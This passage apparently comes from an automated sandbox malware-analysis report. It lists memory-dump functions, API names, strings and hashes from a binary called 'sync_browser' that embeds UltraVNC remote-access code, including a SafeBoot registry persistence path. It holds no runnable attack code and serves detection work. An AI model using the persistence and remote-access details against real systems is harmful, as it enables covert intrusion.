                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalInitializeSection$AddressProc$LibraryLoad
                                                                    • String ID: GetPerTcpConnectionEStats$Iphlpapi.dll$SetPerTcpConnectionEStats$vsocket.cpp : VSocket() m_pDSMPlugin = NULL
                                                                    • API String ID: 3015439405-2946900448
                                                                    • Opcode ID: b5c9a895933125692294ff2e15cdf7522bd1a19dbcf515155b618464db81f3f7
                                                                    • Instruction ID: 3fd10014eac722ccb45ad557178080d385a393a4df132a899b6c12b32c4220c4
                                                                    • Opcode Fuzzy Hash: b5c9a895933125692294ff2e15cdf7522bd1a19dbcf515155b618464db81f3f7
                                                                    • Instruction Fuzzy Hash: 69213871914B9A81EB04CF24FC952AC33A9FB05B48F144136CE5D97368EF3C95AAC760
                                                                    Function 00007FF6DC18D304 Relevance: 16.8, APIs: 11, Instructions: 254COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: free$_errno$EnvironmentVariable__wtomb_environ_invalid_parameter_noinfo
                                                                    • String ID:
                                                                    • API String ID: 101574016-0
                                                                    • Opcode ID: 181369242843f9036f05e592b74b1e6aafa5b20a9f3d11d8321f47b8ab448537
                                                                    • Instruction ID: e382eb2db1eab03573651f63888371a155e540ee484344df0713c6332f70a52a
                                                                    • Opcode Fuzzy Hash: 181369242843f9036f05e592b74b1e6aafa5b20a9f3d11d8321f47b8ab448537
                                                                    • Instruction Fuzzy Hash: 03A19D61E0D76BA1FA15BB15AD00A7D2298AF80BA4F548637DE5D87BC5DE3CF4638300
                                                                    Function 00007FF6DC188A7C Relevance: 16.6, APIs: 11, Instructions: 83COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _errno$FullNamePathfree$ErrorLast_invalid_parameter_noinfocalloc
                                                                    • String ID:
                                                                    • API String ID: 3219262609-0
                                                                    • Opcode ID: bfbee9e4b5986560eceb10190c14978969bf0a457ba4f53162cbca2fe3e34832
                                                                    • Instruction ID: bc35fd591ef492416d44d8c968b2f7fd6274fbfc3b46cf603c80d5dc8171143d
                                                                    • Opcode Fuzzy Hash: bfbee9e4b5986560eceb10190c14978969bf0a457ba4f53162cbca2fe3e34832
                                                                    • Instruction Fuzzy Hash: 8A31A451E0C67A95FA55AF519D00B7D2198AF85BD0F184633ED5EC77C6EE2CA423C300
                                                                    Function 00007FF6DC0ED930 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 85libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$AddressProc$Initialize$FileHandleLibraryLoadModule$CountCreateEnterErrorLastLeaveMappingOpenSemaphoreTickView
                                                                    • String ID: ChangeWindowMessageFilter$GetCursorInfo$user32.dll
                                                                    • API String ID: 173432231-678763868
                                                                    • Opcode ID: faf61d6d44ca246d6e556e1dfbdb385b5274f0d62226512dde9a94f323da9ec3
                                                                    • Instruction ID: 37bcd6ba0010bff0f7c8e1e70f4b07107661f2b68a375a1089b7576c1687d74e
                                                                    • Opcode Fuzzy Hash: faf61d6d44ca246d6e556e1dfbdb385b5274f0d62226512dde9a94f323da9ec3
                                                                    • Instruction Fuzzy Hash: 33412D31619B95A2E64C9B20FE402EC73A8FB84754F504236D7AD83790DFB9A5B7C700
                                                                    Function 00007FF6DC0C6A20 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 78registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseOpenQueryValue
                                                                    • String ID: LANMANNT$LANSECNT$ProductType$SERVERNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                    • API String ID: 3677997916-356703426
                                                                    • Opcode ID: 88216def6c21df696fe551fc804dfdd3315c8a7ded965229e51908db5a4eccae
                                                                    • Instruction ID: 1c0419d93453d0f5940d2bd226de855a46038422cf153055a41daba93fff1d10
                                                                    • Opcode Fuzzy Hash: 88216def6c21df696fe551fc804dfdd3315c8a7ded965229e51908db5a4eccae
                                                                    • Instruction Fuzzy Hash: E4419372A1864B81FB208B61E9403AE33A4FF94348F405133EA5DC6599EF3DD567CB10
                                                                    Function 00007FF6DC0C68F0 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 62registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseOpenQueryValue
                                                                    • String ID: CurrentType$Multiprocessor Checked$Multiprocessor Free$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Uniprocessor Checked$Uniprocessor Free
                                                                    • API String ID: 3677997916-1370392681
                                                                    • Opcode ID: 127efd2f4bb2d730ad2ffcadb57483ca5e65c2607e8512af785212c1471c3a0c
                                                                    • Instruction ID: 61db771afce51918dd3c23dc5be883dc71548a43adbdbd6c2b50b8f29c3e7795
                                                                    • Opcode Fuzzy Hash: 127efd2f4bb2d730ad2ffcadb57483ca5e65c2607e8512af785212c1471c3a0c
                                                                    • Instruction Fuzzy Hash: 38314071A18A5B81FB208B61E8447AD7368FB85348F805133DA8DC65D9EF3DD12B8B40
                                                                    Function 00007FF6DC0F07C0 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 60windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Create$BitmapCompatibleDeleteErrorLastObjectSection
                                                                    • String ID: vncdesktop.cpp : attempting to enable DIBsection blits$vncdesktop.cpp : enabled fast DIBsection blits OK$vncdesktop.cpp : enabled slow blits OK$vncdesktop.cpp : failed to build DIB section - reverting to slow blits$vncdesktop.cpp : failed to create memory bitmap(%d)
                                                                    • API String ID: 554953491-3667255696
                                                                    • Opcode ID: 2412a222e5f925d2ec09e0f324b69aa0f7fbd9fb7eb1a0c9a7fdb40c2cf1af0a
                                                                    • Instruction ID: 54938be1e9fc7bc07d59eaecc1eff9e2acc37edf09284cbe219249bfa7c0df3e
                                                                    • Opcode Fuzzy Hash: 2412a222e5f925d2ec09e0f324b69aa0f7fbd9fb7eb1a0c9a7fdb40c2cf1af0a
                                                                    • Instruction Fuzzy Hash: E5313835A18A9B85EB10DF60E8405ED3368FB84B58F844533DA4D87658DF3CE16BC350
                                                                    Function 00007FF6DC0D3110 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 48registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseCreateValue_errno_invalid_parameter_noinfo_snprintf
                                                                    • String ID: ?$Network$SYSTEM\CurrentControlSet\Control\SafeBoot\%s\%s$Service$uvnc_service
                                                                    • API String ID: 913464532-2910635102
                                                                    • Opcode ID: 1bf795a48dcafc41ba0ceb8bae0d18797e802051582379eab5386516ec84cd5c
                                                                    • Instruction ID: 1a695fb856057e192b89869ea678cf76ee9877abb7ccb9b5b0f8e4e29ec7f21b
                                                                    • Opcode Fuzzy Hash: 1bf795a48dcafc41ba0ceb8bae0d18797e802051582379eab5386516ec84cd5c
                                                                    • Instruction Fuzzy Hash: 12214175A08A9681EB60DB10F85576EB764FBC5358F800136E68C83B68DF7DD12ACF44
                                                                    Function 00007FF6DC0F3170 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 48threadsynchronizationwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    • vncdesktopsink.cpp : ~vncDesktop:: iniwindowthread proper closed , xrefs: 00007FF6DC0F321D
                                                                    • vncdesktopsink.cpp : ~vncDesktop::ERROR: messageloop blocked , xrefs: 00007FF6DC0F31DE
                                                                    • vncdesktopsink.cpp : ~vncDesktop::Tell initwindowthread to close , xrefs: 00007FF6DC0F319A
                                                                    • vncdesktopsink.cpp : initwindowthread already closed , xrefs: 00007FF6DC0F3246
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseHandleThread$MessageObjectPostSingleTerminateWait
                                                                    • String ID: vncdesktopsink.cpp : initwindowthread already closed $vncdesktopsink.cpp : ~vncDesktop:: iniwindowthread proper closed $vncdesktopsink.cpp : ~vncDesktop::ERROR: messageloop blocked $vncdesktopsink.cpp : ~vncDesktop::Tell initwindowthread to close
                                                                    • API String ID: 803186428-2751095142
                                                                    • Opcode ID: ff4a8dadbb3d1f80123651424f61364fee41c37e370f197b6d587ed49a2076d2
                                                                    • Instruction ID: 62e452e67aa8b5e3117d25a48ea7068387d849391a160a3427862ff65fd9caaf
                                                                    • Opcode Fuzzy Hash: ff4a8dadbb3d1f80123651424f61364fee41c37e370f197b6d587ed49a2076d2
                                                                    • Instruction Fuzzy Hash: FB214D229249DA86F3109F25D8586ED236DFB88704F884533CA0E9A165CF3DA5A7C261
                                                                    Function 00007FF6DC1859D8 Relevance: 15.2, APIs: 10, Instructions: 206COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF6DC185D15), ref: 00007FF6DC185A72
                                                                    • malloc.LIBCMT ref: 00007FF6DC185ADB
                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF6DC185D15), ref: 00007FF6DC185B0F
                                                                    • LCMapStringW.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF6DC185D15), ref: 00007FF6DC185B36
                                                                    • LCMapStringW.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF6DC185D15), ref: 00007FF6DC185B7E
                                                                    • malloc.LIBCMT ref: 00007FF6DC185BDB
                                                                      • Part of subcall function 00007FF6DC178C34: _FF_MSGBANNER.LIBCMT ref: 00007FF6DC178C64
                                                                      • Part of subcall function 00007FF6DC178C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF6DC18329C,?,?,?,00007FF6DC187749,?,?,?,00007FF6DC1877F3), ref: 00007FF6DC178C89
                                                                      • Part of subcall function 00007FF6DC178C34: _callnewh.LIBCMT ref: 00007FF6DC178CA2
                                                                      • Part of subcall function 00007FF6DC178C34: _errno.LIBCMT ref: 00007FF6DC178CAD
                                                                      • Part of subcall function 00007FF6DC178C34: _errno.LIBCMT ref: 00007FF6DC178CB8
                                                                    • LCMapStringW.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF6DC185D15), ref: 00007FF6DC185C10
                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF6DC185D15), ref: 00007FF6DC185C50
                                                                    • free.LIBCMT ref: 00007FF6DC185C64
                                                                    • free.LIBCMT ref: 00007FF6DC185C75
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ByteCharMultiStringWide$_errnofreemalloc$AllocHeap_callnewh
                                                                    • String ID:
                                                                    • API String ID: 1080698880-0
                                                                    • Opcode ID: b5a887be6137e653958006011188746c2f8056e99f6c4bc23332a32471009a2b
                                                                    • Instruction ID: e657a854ca564dcfac7d7600f58ba73c833b2d9fb2e925d5e0cb86c4ab362fe3
                                                                    • Opcode Fuzzy Hash: b5a887be6137e653958006011188746c2f8056e99f6c4bc23332a32471009a2b
                                                                    • Instruction Fuzzy Hash: 6681D232A0C75A96FB648F259C8096D6699FF44BA4F444237DA2D83BD4DF3CE5128700
                                                                    Function 00007FF6DC0E69D5 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 224COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$DesktopLeave$CloseCountEnterInputOpenRevertSelfTickTimetime
                                                                    • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                    • API String ID: 2523754900-3977938048
                                                                    • Opcode ID: f00f46bdec5dcfd195635017d4a5b0b55a3711d86be45cf4a2b3171601dbe6f0
                                                                    • Instruction ID: 90ef17ba9ecb45f090b875f8eb978c421d89452b62810a7664646928ce1d8643
                                                                    • Opcode Fuzzy Hash: f00f46bdec5dcfd195635017d4a5b0b55a3711d86be45cf4a2b3171601dbe6f0
                                                                    • Instruction Fuzzy Hash: F2B1E132A0869585FB50CB65C8587FE2BA9EB85B84F194137CA4CC77A5CF3EE462C700
                                                                    Function 00007FF6DC0CB8C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 110networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
